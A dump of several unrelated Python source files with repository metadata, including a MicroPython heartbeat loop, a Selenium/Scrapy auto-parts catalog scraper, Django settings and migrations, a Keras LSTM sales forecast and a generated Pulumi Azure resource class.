resp = resp.json()
oled.fill(0)
oled.DispChar('开始循环', 0, 0)
oled.show()
time.sleep(2)
oled.fill(0)
oled.show()
while True:
if time_set == None:
time_set = time.time()
# print('没有问题1')
if button_a.is_pressed():
rgb.fill( (int(255), int(255), int(255)) )
rgb.write()
status = 'emergency'
else:
rgb.fill( (0, 0, 0) )
rgb.write()
# heartbeat_time = None
heartbeat_Loc = {"latitude": 22.576035, "longitude": 113.943418, "info": 'ahhhhhh'}
# heartbeat_Loc = {"latitude": 22.576035, "longitude": 113.943418}
status = 'ok'
# print('没有问题2')
# print(time.time() - time_set)
if time.time() - time_set >= 5:
heartbeat()
oled.fill(0)
oled.DispChar(str(data.get('status')), 0, 0)
oled.DispChar(str(resp), 0, 16, 1, True)
oled.show()
print(resp)
time_set = None
status = 'ok'
heartbeat_Loc = None
# heartbeat_time = None
print('没有问题3')
if resp.get('code') == 0: #返回数据类型正常
continue
elif resp.get('code') == 1:
print('拐杖未注册')
else:
oled.fill(0)
oled.DispChar('心跳包错误', 0, 0, 1)
# oled.DispChar(str(resp.get('msg')), 0, 16, 1, True) #查看是否正常回应
oled.show()
|
[
"[email protected]"
] | |
885be927b82ec91f5a3ed0442cef540e1f29a5c5
|
3514d1fd4f54f013ad39c55bb72cb997ab3b32c2
|
/cosmos_scrapy-master/cosmos_scrapy/spiders/safetyspider.py
|
9c8122e32ab4d2678effa8fdbb72776d9ffb0fa8
|
[] |
no_license
|
609189660/Data-Crawling
|
ba262ec2fea4ce48d0ad24e52dc667f4a7fe5178
|
5fdbe9b81b1c97be61fcd4fd2cf3aeab5ab26f12
|
refs/heads/master
| 2020-12-02T23:19:03.412377 | 2019-12-31T21:25:18 | 2019-12-31T21:25:18 | 231,147,405 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 9,998 |
py
|
from scrapy.spiders import CrawlSpider, Rule
from scrapy.linkextractors import LinkExtractor
from scrapy import Spider, FormRequest
import scrapy
from selenium import webdriver
from scrapy.selector import Selector
from scrapy.http import Request
from selenium.common.exceptions import NoSuchElementException
import re
from time import sleep
from random import randint
import pandas as pd
from pymongo import MongoClient
import random
from selenium.webdriver.common.keys import Keys
from collections import Counter
from collections import defaultdict
from datetime import datetime
import numpy as np
import random
from collections import Counter
def click_make(driver,make):
driver.get('http://www.safetyautoparts.com/webcatalog/tradcatalog.html')
frame=driver.find_element_by_name('menuFrame')
driver.switch_to_frame(frame)
driver.find_element_by_xpath("//option[text()='" + make + "']").click()
def click_engine(driver,enginecode):
# frame = driver.find_element_by_name('menuFrame')
# driver.switch_to_frame(frame)
driver.find_element_by_xpath("//option[@value='" + enginecode + "']").click()
def save_html_source(carmake,enginecode,enginename,html):
client = MongoClient('mongodb://localhost:27017')
page_dict = dict()
page_dict['car_make'] = carmake
page_dict['engine_code'] = enginecode
page_dict['engine_name'] = enginename
page_dict['html'] = html
client.safety.html_page.insert_one(page_dict)##save the html url in the dic
client.close()
def read_csv():
file_location = 'C:/Users/Server/PycharmProjects/cosmos_scrapy/cosmos_scrapy/spiders/jis_application_final.csv'
df=pd.read_csv(file_location)
# df.sort_values("maker", inplace = True)
# df.drop_duplicates(subset='maker',
# keep='first', inplace=True)
# makelist=df['maker'].tolist()
# makelist=['Toyota','Honda']
makelist=['Isuzu', 'Mitsubishi',
'Nissan', 'Subaru', 'Suzuki', 'Acura','Infiniti', 'Hyundai',
'Kia', 'Lexus','Nissan Ind/UD Trucks', 'Isuzu Industrial','Daihatsu', 'Scion',
'Mitsubishi Ind/Fuso','Chrysler Trucks', 'Daewoo', 'Ford Trucks',
'Chrysler Cars', 'Mazda Industrial', 'Toyota Ind/Hino','Ford Cars', 'GM Industrial', 'Saab',
'GM Cars', 'GM Trucks'
]
# makelist = ['Toyota', 'Honda', 'Mazda', 'Isuzu', 'Mitsubishi',
# 'Nissan', 'Subaru', 'Suzuki', 'Acura', 'Hyundai',
# 'Kia', 'Smart', 'Nissan Ind/UD Trucks', 'Isuzu Industrial',
# 'Jeep', 'Volvo', 'Mitsubishi Ind/Fuso',
# 'Honda Hybrid', 'BMW Hybrid', 'Chrysler Hybrid',
# 'Subaru Hybrid', 'BMW', 'Chrysler Trucks', 'Audi',
# 'Daewoo', 'Porsche', 'Nissan Hybrid', 'Ford Trucks',
# 'Jaguar', 'Chrysler Cars', 'Ford Hybrid', 'Ford Cars',
# 'GM Industrial', 'Infiniti', 'Saab', 'Fiat', 'Lexus',
# 'Toyota Hybrid', 'Volkswagen Hybrid', 'GM Cars', 'GM Trucks',
# 'Land Rover', 'Mazda Industrial', 'Toyota Ind/Hino',
# 'GM Hybrid', 'Mercedes Benz', 'Daihatsu', 'Volkswagen',
# 'Mercedes Benz Hybrid', 'Scion', 'Hyundai Hybrid']
return makelist,df
# makelist=read_csv()
# print(makelist)
# random.shuffle(makelist)
# print(len(makelist))
def filter_out_scrapied_engine(enginelist):#filter the engine
client = MongoClient('mongodb://localhost:27017')
result = client.safety.html_page.find({})
searched_engine = [page_dict['engine_code'] for page_dict in result]
not_searched_engine = []
for engine in enginelist:
if engine not in searched_engine:
print(engine)
not_searched_engine.append(engine)
else:
# print(engine)
continue
return not_searched_engine
# makelist,df=read_csv()
# engine_list = df.loc[df['maker'] == 'Mazda', 'engine_number'].tolist()
# engine_list[7]= 'NA'
# print(len(engine_list))
# print(engine_list)
# engine_list= ['1KC', '3KC', '4KC', '4KE', '2E', '13AC', '3AC', '3E', '3EE', '5EFE', '1NZFE', '2TC', '4AC', '4ALC', '4AGEC', '4AGE', '4AGELC', '4AGZE', '4AF', '4AFE-1', '4AFE-2', '3TC', '7AFE', '1ZZFE', '2ZZGE', '2ZRFE', '1CLC', '1CTLC', '3RC', '8RC', '18RC', '21R', '2CTLC', '2SELC', '1VZFE', '3YEC', '3SGELC', '3SGTE', '3SFE', '3SFE-RAV4', '1AZFE', '4UGSE', '5SFE', '1L', '20R', '4YEC', '2M', '22R-E', '22R', '22RE', '22RTEC', '2TZFE', '2TZFZE', '2RZFE', '2AZFE', '2L', '2LT', '2ARFE', '2VZFE', '4M', '4ME', '2TRFE', '3RZFE', '1ARFE', '5ME', '5MGE', '7MGE', '7MGTE', '3VZE', '3VZFE', '1MZFE', '2JZGE', '2JZGTE', '3MZFE', '5VZFE', '2GRFE', '2GRFKS', '1F', '3FE', '1GRFE', '2F', '1FZFE', '1URFE', '2UZFE', '3URFE']
# print(filter_out_scrapied_engine(engine_list))
# np.random.shuffle(engine_list)
def filter_out_scrapied_make(makelist,df):
client = MongoClient('mongodb://localhost:27017')
result = client.safety.html_page.find({})
searched_make = [page_dict['car_make'] for page_dict in result]
#searched_make does not change so result is used once not like result2 below
# print(searched_make)
# result2 = client.safety.html_page.find({})
# searched_engine1 = [page_dict['engine_code'] for page_dict in result2]
# print(searched_engine1)
# result2 = client.safety.html_page.find({})
not_searched_make = []
# makelist=['Mitsubishi','Nissan']
for make in makelist:
# print(make)
# count_from_db = client.safety.html_page.find({'car_make':make}).count()
# print (count_from_db)
result2 = client.safety.html_page.find({})
# find() function return a cursor to the db so we need to activate every time make change
searched_engine = [page_dict['engine_code'] for page_dict in result2 if page_dict['car_make']==make]
# print(searched_engine)
enginelist = df.loc[df['maker'] == make, 'engine_number'].tolist()
# print(len(searched_engine))
# print(len(enginelist))
# print("")
if make not in searched_make:
# print(make)
not_searched_make.append(make)
elif len(searched_engine)!=len(enginelist):
not_searched_make.append(make)
# print(len(searched_engine))
# print(len(enginelist))
# else:
# # print(engine)
# continue
return not_searched_make
# makelist, df = read_csv()
# print(filter_out_scrapied_make(makelist,df))
def get_engine_code_list(df,make):
enginelist = df.loc[df['maker'] == make, 'engine_number'].tolist()
return enginelist
# make='Toyota'
# makelist,df=read_csv()
# print(get_engine_code_list(df,make))
def frame_switch(driver,name):
driver.switch_to.frame(driver.find_element_by_name(name))
def amount_of_download():
file_location = 'C:/Users/Server/PycharmProjects/cosmos_scrapy/cosmos_scrapy/spiders/jis_application_final.csv'
df = pd.read_csv(file_location)
maker=df["maker"].tolist()
return Counter(maker)
# print(amount_of_download())
class safetyspider(Spider):
name = "safety"
count = 0
def start_requests(self):
file_location = 'C:/Users/Server/Downloads/chromedriver_win32/chromedriver.exe'
# total_searched_itmes = 0
self.driver = webdriver.Chrome(file_location)
# self.driver.maximize_window()
# self.driver.set_window_size(2000,2500)
# global base_url
# tag = 'rareelectrical_generator_search_page'
# self.driver.get(base_url)
sleep(5)
self.driver.get('http://www.safetyautoparts.com/webcatalog/tradcatalog.html')
makelist, df = read_csv()
makelist = filter_out_scrapied_make(makelist,df)
# makelist=np.random.shuffle(makelist)
print(makelist)
for make in makelist:
# self.driver.get('http://www.safetyautoparts.com/webcatalog/tradcatalog.html')
sleep(randint(5, 10))
click_make(self.driver,make)
sleep(randint(5, 10))
print('make:'+make)
enginelist =get_engine_code_list(df,make)
# enginelist[7]='NA'
# print('enginelist:'+enginelist)
enginelist = filter_out_scrapied_engine(enginelist)
if enginelist is None:
continue
# print('filtered list:'+enginelist)
np.random.shuffle(enginelist)
# print('shuffled lsit:'+enginelist)
# self.count= self.count + 1
# print('total scrapied item:'+self.count)
# if self.count > 3:
# raise scrapy.exceptions.CloseSpider('------end of scrapy')
# if len(enginelist)==0:
# continue
for engine in enginelist:
# print(engine)
click_engine(self.driver,engine)
sleep(randint(5, 10))
carmake=make
enginecode=engine
enginename=self.driver.find_element_by_xpath("//option[@value='" + engine + "']").text
self.driver.switch_to.default_content()
frame_switch(self.driver, 'resultsFrame')
html=self.driver.page_source
self.driver.switch_to.default_content()
frame_switch(self.driver, 'menuFrame')
save_html_source(carmake, enginecode, enginename, html)
print("save success: "+enginecode)
self.count = self.count + 1
print('This run scrapied item:' + str(self.count))
if self.count == 20:
sleep(randint(3600, 3700))
elif self.count == 40:
sleep(randint(7200, 7300))
elif self.count >= 50:
raise scrapy.exceptions.CloseSpider('------end of scrapy')
sleep(randint(300,600))
raise scrapy.exceptions.CloseSpider('------end of scrapy')
|
[
"[email protected]"
] | |
00a25c59ba966ef3a5689248861ee91039bece15
|
ab027e5be1181bd0e55bbb80a1c27cff93318483
|
/urlis/manage.py
|
38e31523f5f7810ccfbba35e072068950b9bd006
|
[] |
no_license
|
miri-san-so/Urlis
|
e1d1961c3510d14c1e8b8fd1c5b10a85842afed8
|
e48477682ed861b237958cf219e4d7db6f520d41
|
refs/heads/master
| 2021-05-28T23:54:25.470278 | 2020-04-09T06:25:08 | 2020-04-09T06:25:08 | 254,288,791 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 646 |
py
|
#!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'urlis.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
|
[
"[email protected]"
] | |
f4429fdafc52467555a79089f8af89d3f9c0d2f6
|
92edc96cfdd42463868d1106f703b8cd229d0369
|
/fractal tree.py
|
7ff575521494e8396b816eb3df88fe0cf017fd8b
|
[] |
no_license
|
jiangnandekafuka/python
|
75e5203d6142755f6efed4749a98240cb593a386
|
85edaa3b2d7e07071bb9c393e8f745d480e09e78
|
refs/heads/master
| 2020-09-02T17:57:13.593638 | 2019-11-06T15:27:57 | 2019-11-06T15:27:57 | 219,274,908 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 236 |
py
|
"""
作者:李亮亮
功能:分形树绘制
版本号:1.0
日期:2019/7/8
新增功能:使用循环和递归绘制分形树
"""
import turtle
def main():
"""
主函数
"""
if __name__=='__main__':
main()
|
[
"[email protected]"
] | |
e26c9e3d12ba904f4b5590c36fce0d8b72232a86
|
af23581c3f0088764d03e58daac8660a763520c5
|
/process_txt/translate.py
|
cc7a9dc5e986b4122938569ce96ed3e7df270367
|
[] |
no_license
|
log1206/evaluation_matrix_graph_generator
|
7d1b82cc0848f857e5e7e60625bfac302a121f86
|
51c146086fc575d041e4a77a7bcffea15e046f40
|
refs/heads/master
| 2022-11-04T21:56:13.508189 | 2020-06-22T11:37:47 | 2020-06-22T11:37:47 | 274,119,629 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,323 |
py
|
import re
f = open("usage.txt","r",encoding="utf-16")
f0 = open("time.txt","w",encoding="utf-16")
f1 = open("mem.txt","w",encoding="utf-16")
f2 = open("cpu.txt","w",encoding="utf-16")
f3 = open("gpu.txt","w",encoding="utf-16")
f4 = open("gpu_mem.txt","w",encoding="utf-16")
"""
try:
while True:
contents = f.readline()
except EOFError:
pass
"""
## read time and process
contents = f.readline()
str_no_dot = contents.split(".")
strr =str_no_dot[0]
time = int(strr)
current = time - time
f0.writelines(str(current)+"\n")
## first time for each
contents = f.readline()
f1.writelines(contents)
contents = f.readline()
f2.writelines(contents)
contents = f.readline()
f3.writelines(contents)
contents = f.readline()
f4.writelines(contents)
contents = f.readline()
##loop process
while True:
contents = f.readline()
if contents == '':
break
str_no_dot = contents.split(".")
strr =str_no_dot[0]
current = int(strr)
current =current -time
f0.writelines(str(current)+"\n")
contents = f.readline()
f1.writelines(contents)
contents = f.readline()
f2.writelines(contents)
contents = f.readline()
f3.writelines(contents)
contents = f.readline()
f4.writelines(contents)
contents = f.readline()
if contents == '':
break
|
[
"[email protected]"
] | |
b0593bc623f07101fd1c4aac9dd0a4ebc0980eb2
|
955b968d46b4c436be55daf8aa1b8fc8fe402610
|
/ch04/set_window_size.py
|
110459bc02e4e910978194acc115ddfccc6554d7
|
[] |
no_license
|
han-huang/python_selenium
|
1c8159fd1421b1f0e87cb0df20ae4fe82450f879
|
56f9f5e5687cf533c678a1c12e1ecaa4c50a7795
|
refs/heads/master
| 2020-03-09T02:24:48.882279 | 2018-04-07T15:06:18 | 2018-04-07T15:06:18 | 128,535,917 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 265 |
py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from selenium import webdriver
driver = webdriver.Firefox()
driver.get("https://mail.google.com")
# 參數字為像素點
print("設定瀏覽器寬480 高800顯示")
driver.set_window_size(480, 800)
# driver.quit()
|
[
"vagrant@LaravelDemoSite"
] |
vagrant@LaravelDemoSite
|
98c2bc89454f0f4bd6d7b33b7d317117b7910b88
|
8523e8b59ac75c07736ae72f0ee90d88fbe40fed
|
/Bookstore/Bookstore/settings.py
|
143b0f30dd8f11ae2d579ee6ba8b0e3358fbf52f
|
[] |
no_license
|
Sov-JC/SoftwareEngineering
|
daaad391102b5f9a490c0deb1a724c41270809cc
|
eb5243cdef0bd65bdcf32fb3a0ae812cf9ae238e
|
refs/heads/master
| 2020-03-18T00:44:50.324008 | 2018-07-28T03:35:28 | 2018-07-28T03:35:28 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,435 |
py
|
"""
Django settings for Bookstore project.
Generated by 'django-admin startproject' using Django 2.0.5.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
TEMPLATE_DIR = os.path.join(BASE_DIR, "templates")
STATIC_DIR = os.path.join(BASE_DIR, "static")
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '(e9%r0d4uu2crhx)*ekk(1v@sr$gn*-p-qkcn6f%(5h3pskjmc'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'myCart',
#'comment',
'homepage',
#'search', #remove this
'prof',
'database',
'products',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'Bookstore.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [TEMPLATE_DIR,],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'Bookstore.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.0/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = [
STATIC_DIR,
]
MEDIA_ROOT = os.path.join(BASE_DIR, 'media/')
MEDIA_URL = '/media/'
|
[
"[email protected]"
] | |
bb4b43d08b89cebc31af388294610f1431075c49
|
b89780aaa5271b7220330cc85ddae132530aae49
|
/unity_bundles/serializers.py
|
500ee1622f5cd15ea03a8705003b497fbac29a6e
|
[] |
no_license
|
feliamunda/living_walls_api
|
4bbbc925154c4963f9c3196d8ba1bf5733a7bdbd
|
1182c26ee7e06ff1958a9100482f81d21b32cfff
|
refs/heads/master
| 2023-08-03T02:12:11.777153 | 2021-09-19T02:18:48 | 2021-09-19T02:18:48 | 408,005,868 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 375 |
py
|
from django.db.models import fields
from rest_framework import serializers
from .models import Asset
class AssetSerializer(serializers.Serializer):
name = serializers.CharField(max_length=70)
bundle = serializers.FileField()
class Meta:
model = Asset
def create(self, validated_data):
return self.Meta.model.objects.create(**validated_data)
|
[
"[email protected]"
] | |
13a119cadbd0faa4e12dfb1a370603ff73f1149c
|
281cec8c8a093c5e73ba17b9a96325acc225d406
|
/code_which_works.py
|
f6af1a8bc7852c0a3f84264abcd68402a75434f0
|
[] |
no_license
|
zahessi/pygame_pong
|
cd86a8b39891f06fc90e760449f69fb03c1b37c9
|
d33be1995768fc87c4406590d149957fc65950bc
|
refs/heads/master
| 2020-04-15T12:10:10.741786 | 2019-01-09T21:50:37 | 2019-01-09T21:50:37 | 164,662,741 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 205 |
py
|
from classes import Game
def main():
game = Game()
game_objects_pool = game.setup_game()
while 1:
game.update_game_screen(*game_objects_pool)
if __name__ == '__main__':
main()
|
[
"[email protected]"
] | |
3df0ea853c5c6f446d2fcad384c523b533d6f0b0
|
038cb642f628adca4bcc129111c9f37f1331642c
|
/home/migrations/0003_auto_20210213_1642.py
|
ae2dba8126dab5ca2c13c350d94af864a9f8d9ef
|
[] |
no_license
|
dieudo25/tf_app
|
82edbe744d4764ada0df643f4869bc3526d4b110
|
ff836c59bd27fbd15db478ef7b654e58a59ca94f
|
refs/heads/master
| 2023-04-03T21:17:04.368434 | 2021-02-17T13:03:10 | 2021-02-17T13:03:10 | 338,341,550 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 730 |
py
|
# Generated by Django 3.1 on 2021-02-13 16:42
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('wagtailcore', '0060_fix_workflow_unique_constraint'),
('home', '0002_auto_20210213_1630'),
]
operations = [
migrations.RenameField(
model_name='homepage',
old_name='banner_cta',
new_name='banner_cta_1',
),
migrations.AddField(
model_name='homepage',
name='banner_cta_2',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailcore.page'),
),
]
|
[
"[email protected]"
] | |
ecf28c8b348c9f90a067ed024a81f8d03474e056
|
821583d4265912317ba78ca240cc3cdf2b4aad18
|
/LSTM_Stock.py
|
95621c05e18188e54f5763cb940cafc71bcd324c
|
[] |
no_license
|
Soumi7/PG-StockManagement
|
5f0f6ba98e00169f98dc97298d1695c52c8de257
|
b5e4e7a715ecd7c054c22228542332202e104515
|
refs/heads/master
| 2023-03-03T00:07:02.770993 | 2021-01-31T14:48:13 | 2021-01-31T14:48:13 | 261,162,601 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,959 |
py
|
from pandas import DataFrame
from pandas import Series
from pandas import concat
from pandas import read_csv
from datetime import datetime
from sklearn.metrics import mean_squared_error
from sklearn.preprocessing import MinMaxScaler
from keras.models import Sequential
from keras.layers import Dense
from keras.layers import LSTM
from math import sqrt
from matplotlib import pyplot
import numpy
# date-time parsing function for loading the dataset
def parser(x):
return datetime.strptime('201'+x, '%Y-%m')
# frame a sequence as a supervised learning problem
def timeseries_to_supervised(data, lag=1):
df = DataFrame(data)
columns = [df.shift(i) for i in range(1, lag+1)]
columns.append(df)
df = concat(columns, axis=1)
df.fillna(0, inplace=True)
return df
# create a differenced series
def difference(dataset, interval=1):
diff = list()
for i in range(interval, len(dataset)):
value = dataset[i] - dataset[i - interval]
diff.append(value)
return Series(diff)
# invert differenced value
def inverse_difference(history, yhat, interval=1):
return yhat + history[-interval]
# scale train and test data to [-1, 1]
def scale(train, test):
# fit scaler
scaler = MinMaxScaler(feature_range=(-1, 1))
scaler = scaler.fit(train)
# transform train
train = train.reshape(train.shape[0], train.shape[1])
train_scaled = scaler.transform(train)
# transform test
test = test.reshape(test.shape[0], test.shape[1])
test_scaled = scaler.transform(test)
return scaler, train_scaled, test_scaled
# inverse scaling for a forecasted value
def invert_scale(scaler, X, value):
new_row = [x for x in X] + [value]
array = numpy.array(new_row)
array = array.reshape(1, len(array))
inverted = scaler.inverse_transform(array)
return inverted[0, -1]
# fit an LSTM network to training data
def fit_lstm(train, batch_size, nb_epoch, neurons):
X, y = train[:, 0:-1], train[:, -1]
X = X.reshape(X.shape[0], 1, X.shape[1])
model = Sequential()
model.add(LSTM(neurons, batch_input_shape=(batch_size, X.shape[1], X.shape[2]), stateful=True))
model.add(Dense(1))
model.compile(loss='mean_squared_error', optimizer='adam')
for i in range(nb_epoch):
model.fit(X, y, epochs=1, batch_size=batch_size, verbose=0, shuffle=False)
model.reset_states()
return model
# make a one-step forecast
def forecast_lstm(model, batch_size, X):
X = X.reshape(1, 1, len(X))
yhat = model.predict(X, batch_size=batch_size)
return yhat[0,0]
# load dataset
series = read_csv('Sales.csv', header=0, parse_dates=[0], index_col=0, squeeze=True, date_parser=parser)
# transform data to be stationary
raw_values = series.values
diff_values = difference(raw_values, 1)
# transform data to be supervised learning
supervised = timeseries_to_supervised(diff_values, 1)
supervised_values = supervised.values
# split data into train and test-sets
train, test = supervised_values[0:-3], supervised_values[-3:]
# transform the scale of the data
scaler, train_scaled, test_scaled = scale(train, test)
# fit the model
lstm_model = fit_lstm(train_scaled, 1, 3000, 4)
# forecast the entire training dataset to build up state for forecasting
train_reshaped = train_scaled[:, 0].reshape(len(train_scaled), 1, 1)
lstm_model.predict(train_reshaped, batch_size=1)
# walk-forward validation on the test data
predictions = list()
for i in range(len(test_scaled)):
# make one-step forecast
X, y = test_scaled[i, 0:-1], test_scaled[i, -1]
yhat = y
# invert scaling
yhat = invert_scale(scaler, X, yhat)
# invert differencing
yhat = inverse_difference(raw_values, yhat, len(test_scaled)+1-i)
# store forecast
predictions.append(yhat)
expected = raw_values[len(train) + i + 1]
print('Month=%d, Predicted=%f, Expected=%f' % (i+1, yhat, expected))
# report performance
rmse = sqrt(mean_squared_error(raw_values[-3:], predictions))
print('Test RMSE: %.3f' % rmse)
# line plot of observed vs predicted
pyplot.plot(raw_values[-3:])
pyplot.plot(predictions)
pyplot.show()
|
[
"[email protected]"
] | |
87fa353d224bca02fb3655134746bec120ffc10b
|
90419da201cd4948a27d3612f0b482c68026c96f
|
/sdk/python/pulumi_azure_nextgen/compute/v20191201/gallery_application_version.py
|
09d6082a067f10eae575fb0b3681e034d10ed7c2
|
[
"BSD-3-Clause",
"Apache-2.0"
] |
permissive
|
test-wiz-sec/pulumi-azure-nextgen
|
cd4bee5d70cb0d332c04f16bb54e17d016d2adaf
|
20a695af0d020b34b0f1c336e1b69702755174cc
|
refs/heads/master
| 2023-06-08T02:35:52.639773 | 2020-11-06T22:39:06 | 2020-11-06T22:39:06 | 312,993,761 | 0 | 0 |
Apache-2.0
| 2023-06-02T06:47:28 | 2020-11-15T09:04:00 | null |
UTF-8
|
Python
| false | false | 7,987 |
py
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from ... import _utilities, _tables
from . import outputs
from ._inputs import *
__all__ = ['GalleryApplicationVersion']
class GalleryApplicationVersion(pulumi.CustomResource):
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
gallery_application_name: Optional[pulumi.Input[str]] = None,
gallery_application_version_name: Optional[pulumi.Input[str]] = None,
gallery_name: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
publishing_profile: Optional[pulumi.Input[pulumi.InputType['GalleryApplicationVersionPublishingProfileArgs']]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
__props__=None,
__name__=None,
__opts__=None):
"""
Specifies information about the gallery Application Version that you want to create or update.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] gallery_application_name: The name of the gallery Application Definition in which the Application Version is to be created.
:param pulumi.Input[str] gallery_application_version_name: The name of the gallery Application Version to be created. Needs to follow semantic version name pattern: The allowed characters are digit and period. Digits must be within the range of a 32-bit integer. Format: <MajorVersion>.<MinorVersion>.<Patch>
:param pulumi.Input[str] gallery_name: The name of the Shared Application Gallery in which the Application Definition resides.
:param pulumi.Input[str] location: Resource location
:param pulumi.Input[pulumi.InputType['GalleryApplicationVersionPublishingProfileArgs']] publishing_profile: The publishing profile of a gallery Image Version.
:param pulumi.Input[str] resource_group_name: The name of the resource group.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Resource tags
"""
if __name__ is not None:
warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
resource_name = __name__
if __opts__ is not None:
warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
opts = __opts__
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = dict()
if gallery_application_name is None:
raise TypeError("Missing required property 'gallery_application_name'")
__props__['gallery_application_name'] = gallery_application_name
if gallery_application_version_name is None:
raise TypeError("Missing required property 'gallery_application_version_name'")
__props__['gallery_application_version_name'] = gallery_application_version_name
if gallery_name is None:
raise TypeError("Missing required property 'gallery_name'")
__props__['gallery_name'] = gallery_name
if location is None:
raise TypeError("Missing required property 'location'")
__props__['location'] = location
if publishing_profile is None:
raise TypeError("Missing required property 'publishing_profile'")
__props__['publishing_profile'] = publishing_profile
if resource_group_name is None:
raise TypeError("Missing required property 'resource_group_name'")
__props__['resource_group_name'] = resource_group_name
__props__['tags'] = tags
__props__['name'] = None
__props__['provisioning_state'] = None
__props__['replication_status'] = None
__props__['type'] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:compute/latest:GalleryApplicationVersion"), pulumi.Alias(type_="azure-nextgen:compute/v20190301:GalleryApplicationVersion"), pulumi.Alias(type_="azure-nextgen:compute/v20190701:GalleryApplicationVersion"), pulumi.Alias(type_="azure-nextgen:compute/v20200930:GalleryApplicationVersion")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(GalleryApplicationVersion, __self__).__init__(
'azure-nextgen:compute/v20191201:GalleryApplicationVersion',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'GalleryApplicationVersion':
"""
Get an existing GalleryApplicationVersion resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = dict()
return GalleryApplicationVersion(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def location(self) -> pulumi.Output[str]:
"""
Resource location
"""
